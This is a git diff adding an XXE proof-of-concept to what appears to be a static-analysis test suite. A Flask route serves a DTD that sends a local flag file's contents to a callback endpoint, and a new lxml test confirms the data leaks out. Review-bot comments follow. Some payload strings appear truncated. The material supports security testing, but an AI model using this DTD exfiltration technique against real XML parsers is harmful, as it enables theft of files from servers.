diff --git a/python/ql/test/experimental/library-tests/frameworks/XML/poc/PoC.py b/python/ql/test/experimental/library-tests/frameworks/XML/poc/PoC.py
index 77d6c032683..b4cb2faf304 100644
--- a/python/ql/test/experimental/library-tests/frameworks/XML/poc/PoC.py
+++ b/python/ql/test/experimental/library-tests/frameworks/XML/poc/PoC.py
@@ -70,6 +70,10 @@ dtd_retrieval = f"""
 bar
 """
+exfiltrate_through_dtd_retrieval = f"""
+ %xxe; ]>
+"""
+
 # ==============================================================================
 # other setup
@@ -95,6 +99,22 @@ def test_xxe():
 hit_xxe = True
 return "ok"
+@app.route("/exfiltrate-through.dtd")
+def exfiltrate_through_dtd():
+ return f"""
+">
+%eval;
+%exfiltrate;
+ """
+
+exfiltrated_data = None
+@app.route("/exfiltrate-data")
+def exfiltrate_data():
+ from flask import request
+ global exfiltrated_data
+ exfiltrated_data = request.args["data"]
+ return "ok"
+
 def run_app():
 app.run(host=HOST, port=PORT)
@@ -346,7 +366,7 @@ class TestLxml:
 parser = lxml.etree.XMLParser()
 root = lxml.etree.fromstring(local_xxe, parser=parser)
 assert root.tag == "test"
- assert root.text == "SECRET_FLAG\n", root.text
+ assert root.text == "SECRET_FLAG", root.text
 @staticmethod
 def test_local_xxe_disabled():
@@ -412,6 +432,16 @@ class TestLxml:
 pass
 assert hit_dtd == False
+ @staticmethod
+ def test_exfiltrate_through_dtd():
+ # note that this only works when the data to exfiltrate does not contain a newline :|
+ global exfiltrated_data
+ exfiltrated_data = None
+ parser = lxml.etree.XMLParser(load_dtd=True, no_network=False)
+ with pytest.raises(lxml.etree.XMLSyntaxError):
+ lxml.etree.fromstring(exfiltrate_through_dtd_retrieval, parser=parser)
+
+ assert exfiltrated_data == "SECRET_FLAG"
 # ==============================================================================
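Review bot: `request.args["data"]` in `exfiltrate_data` raises `KeyError` (Werkzeug's `BadRequestKeyError`, answered as a 400) whenever the callback arrives without a `data` parameter, so a malformed round-trip leaves `exfiltrated_data` at `None` and the test's final assertion fails with no indication of what the server actually received. Recording the raw query on the miss, `exfiltrated_data = request.args.get("data", request.query_string)`, keeps the success path identical and makes that failure self-describing in the assertion output. The function-local `from flask import request` is also a style point: `app` is presumably built from a module-level flask import outside this hunk, and `request` belongs next to it rather than inside the view body.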
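Review bot: `pytest.raises(lxml.etree.XMLSyntaxError)` in `test_exfiltrate_through_dtd` accepts any parse failure, including one where the external DTD was never fetched at all, so the only evidence of the DTD round-trip is the final `exfiltrated_data` assertion; a hit flag set in the `/exfiltrate-through.dtd` view and asserted here, the way the preceding test asserts `hit_dtd` (visible in the hunk's context), would separate "DTD not fetched" from "fetched but callback failed". The newline comment should also record why the `flag` fixture lost its trailing newline in this same commit, e.g. `# the flag fixture is stored without a trailing newline for this reason`. The enclosing `class TestLxml` starts outside the hunk.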
diff --git a/python/ql/test/experimental/library-tests/frameworks/XML/poc/flag b/python/ql/test/experimental/library-tests/frameworks/XML/poc/flag
index 45c9436ee9f..b8bd6838774 100644
--- a/python/ql/test/experimental/library-tests/frameworks/XML/poc/flag
+++ b/python/ql/test/experimental/library-tests/frameworks/XML/poc/flag
@@ -1 +1 @@
-SECRET_FLAG
+SECRET_FLAG
\ No newline at end of file